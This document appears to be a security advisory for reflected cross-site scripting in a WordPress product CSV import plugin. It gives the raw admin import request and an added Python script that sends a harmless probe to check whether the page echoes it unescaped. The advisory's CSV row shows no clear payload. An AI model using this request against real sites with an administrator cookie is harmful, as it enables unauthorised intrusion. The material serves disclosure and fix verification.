The plugin does not sanitise and escape the imported CSV data before outputting it back in the page, leading to Reflected Cross-Site Scripting. The import is performed from the plugin's admin page, so the request below is sent with a logged-in administrator's cookie.
POST /wp-admin/admin.php?page=woo_pi&tab=import HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26500037853062016269678995697
Content-Length: 1234
Connection: close
Cookie: [logged in admin]
Upgrade-Insecure-Requests: 1

-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="upload_method"

upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file"; filename="a.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Pumpkin spice cupcake, Pumpkin spice cupcake 3",5.99, Bakery,128,Dessert,
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file_ftp[passive]"

auto
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="delimiter"

,
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="category_separator"

|
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="parent_child_delimiter"

>
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="action"

upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="page_options"

csv_file
-----------------------------26500037853062016269678995697--
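The following Python script is an added example, not part of the advisory and not the plugin's own code. It rebuilds the multipart import request shown above with a harmless probe string in the product Name field and classifies the response as vulnerable (probe echoed verbatim), escaped (only the HTML-escaped form appears), or not reflected. The probe string, the script name, the argument layout and the CSV quoting of the Name field are assumptions; the field names, order and boundary are taken from the request above. Nothing is sent unless a target URL and an admin cookie are given, since the import requires an administrator session.

```python
# Added example: reproduce the CSV import request from the advisory with a
# harmless probe and check whether the import page echoes it unescaped.
import csv
import html
import io
import sys
import urllib.request

# Boundary and form fields copied from the advisory's request.
BOUNDARY = "---------------------------26500037853062016269678995697"
PLAIN_FIELDS = [
    ("csv_file_ftp[passive]", "auto"),
    ("delimiter", ","),
    ("category_separator", "|"),
    ("parent_child_delimiter", ">"),
    ("action", "upload"),
    ("page_options", "csv_file"),
]
# Constructed probe (assumption): markup plus a double quote, so a correctly
# escaping output layer would turn it into &lt;...&quot;...&gt; and the check
# cannot be satisfied by an unrelated echo.
PROBE = '<xss-probe "x">'


def build_csv(product_name):
    """One-product CSV in the advisory's column layout. csv.writer quotes the
    Name field when it contains quotes or commas, so the row still parses
    (the advisory's own row has a stray quote in the Name column)."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["Name", "Content", "Price", "Gender", "sku", "Multi_cat", "Thumbnail"])
    writer.writerow([product_name, "Pumpkin spice cupcake", "5.99", "Bakery", "128", "Dessert", ""])
    return buf.getvalue()


def build_multipart(csv_text, boundary=BOUNDARY):
    """multipart/form-data body in the same part order as the advisory."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="upload_method"\r\n\r\nupload\r\n',
        f'--{boundary}\r\nContent-Disposition: form-data; name="csv_file"; filename="a.csv"\r\n'
        f"Content-Type: text/csv\r\n\r\n{csv_text}\r\n",
    ]
    for name, value in PLAIN_FIELDS:
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8")


def classify(response_html, probe=PROBE):
    """'vulnerable' if the probe is echoed verbatim, 'escaped' if only its
    HTML-escaped form appears, otherwise 'not reflected'."""
    if probe in response_html:
        return "vulnerable"
    if html.escape(probe) in response_html:
        return "escaped"
    return "not reflected"


def send_import(base_url, admin_cookie, body, boundary=BOUNDARY):
    """POST the body to the import tab as the logged-in admin; return the HTML."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/wp-admin/admin.php?page=woo_pi&tab=import",
        data=body,
        method="POST",
        headers={
            "Content-Type": f"multipart/form-data; boundary={boundary}",
            "Cookie": admin_cookie,
        },
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: check_import_xss.py https://target 'wordpress_logged_in_...=...'")
    page = send_import(sys.argv[1], sys.argv[2], build_multipart(build_csv(PROBE)))
    print(classify(page))
```

Run it against a test instance only; the cookie argument is the full admin `Cookie` header value. A result of "escaped" after applying a fix that wraps the echoed import fields in esc_html()/esc_attr() is the expected outcome, while "not reflected" means the field was not echoed at all and the check should be re-run against the page that displays the imported data.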